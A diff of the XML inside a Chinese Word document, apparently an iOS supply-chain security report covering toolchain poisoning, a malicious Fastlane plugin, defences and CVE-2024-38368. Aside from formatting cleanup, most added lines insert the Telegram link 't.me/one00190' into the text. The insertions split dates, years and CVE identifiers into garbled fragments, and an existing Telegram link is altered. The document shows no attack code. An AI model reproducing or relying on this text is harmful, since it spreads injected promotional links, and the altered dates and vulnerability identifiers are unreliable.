--- a/iOS供应链安全分析报告.docx
+++ b/iOS供应链安全分析报告.docx
@@ -6,7 +6,6 @@
       <w:pPr>
         <w:pStyle w:val="a4"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="40"/>
         </w:rPr>
       </w:pPr>
@@ -28,9 +27,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a5"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -87,12 +83,6 @@
         <w:gridCol w:w="5600"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:jc w:val="center"/>
         </w:trPr>
@@ -119,7 +109,70 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:b/>
               </w:rPr>
-              <w:t>2026-10-07</w:t>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>t.me/one</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>t.me/one00190t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>19</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>26-1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>7</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -177,12 +230,13 @@
       <w:pPr>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:color w:val="1F3864"/>
           <w:sz w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -637,7 +691,19 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>CVE-2024-38368</w:t>
+        <w:t>CVE-2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>24-38368</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1153,7 +1219,13 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>10</w:t>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1987,29 +2059,21 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_Toc242275482"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc242275482"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>一、概述</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:bookmarkEnd w:id="1"/>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2058,9 +2122,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2104,9 +2165,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2174,9 +2232,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2220,9 +2275,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2263,11 +2315,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2326,11 +2373,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2342,9 +2384,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2363,9 +2402,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2383,7 +2419,19 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">CVE-2024-38368 </w:t>
+        <w:t>CVE-2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">24-38368 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2396,9 +2444,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2423,9 +2468,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2444,9 +2486,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2459,9 +2498,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2471,11 +2507,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2503,11 +2534,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2542,17 +2568,20 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>https://t.me/pjx7120</w:t>
+        <w:t>https://t.me/pjx712</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc242275483"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc242275483"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2560,16 +2589,13 @@
         <w:lastRenderedPageBreak/>
         <w:t>二、开发工具链污染</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="1"/>
+      <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc242275484"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc242275484"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2594,14 +2620,9 @@
         </w:rPr>
         <w:t>供应链攻击的里程碑</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2619,7 +2640,19 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">2015 </w:t>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">15 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2641,11 +2674,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2685,11 +2713,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2707,9 +2730,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">1. </w:t>
@@ -2781,9 +2801,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">2. </w:t>
@@ -2823,9 +2840,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">3. </w:t>
@@ -2859,9 +2873,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">4. </w:t>
@@ -2908,9 +2919,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">5. </w:t>
@@ -2942,11 +2950,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2965,9 +2968,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3004,9 +3004,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3031,9 +3028,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3058,9 +3052,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3070,11 +3061,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3093,9 +3079,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3127,9 +3110,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3161,9 +3141,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3183,9 +3160,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3216,11 +3190,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3239,9 +3208,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3272,9 +3238,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3305,9 +3268,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3331,11 +3291,8 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc242275485"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc242275485"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3348,7 +3305,7 @@
         </w:rPr>
         <w:t>其他开发工具链攻击</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -3370,12 +3327,6 @@
         <w:gridCol w:w="2294"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -3470,12 +3421,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -3512,7 +3457,37 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2020-10</w:t>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>-1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3602,12 +3577,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -3644,7 +3613,31 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2021-09</w:t>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>21-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>9</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3720,12 +3713,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -3762,7 +3749,31 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2023-03</w:t>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>23-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3824,12 +3835,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -3846,7 +3851,6 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>Malicious Fastlane Plugin</w:t>
             </w:r>
           </w:p>
@@ -3867,7 +3871,31 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2024-01</w:t>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>24-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3945,11 +3973,6 @@
     </w:tbl>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3968,9 +3991,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3983,9 +4003,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3998,9 +4015,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4025,9 +4039,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4051,11 +4062,8 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc242275486"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc242275486"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4068,7 +4076,7 @@
         </w:rPr>
         <w:t>开发工具链攻击的防御</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -4089,12 +4097,6 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4166,12 +4168,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4272,12 +4268,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4356,12 +4346,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4455,12 +4439,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4554,12 +4532,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4653,12 +4625,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4728,28 +4694,21 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc242275487"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc242275487"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t>三、依赖管理攻击</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc242275488"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc242275488"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4766,7 +4725,19 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>CVE-2024-38368</w:t>
+        <w:t>CVE-2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>24-38368</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4774,14 +4745,9 @@
         </w:rPr>
         <w:t>）</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
-    </w:p>
-    <w:p>
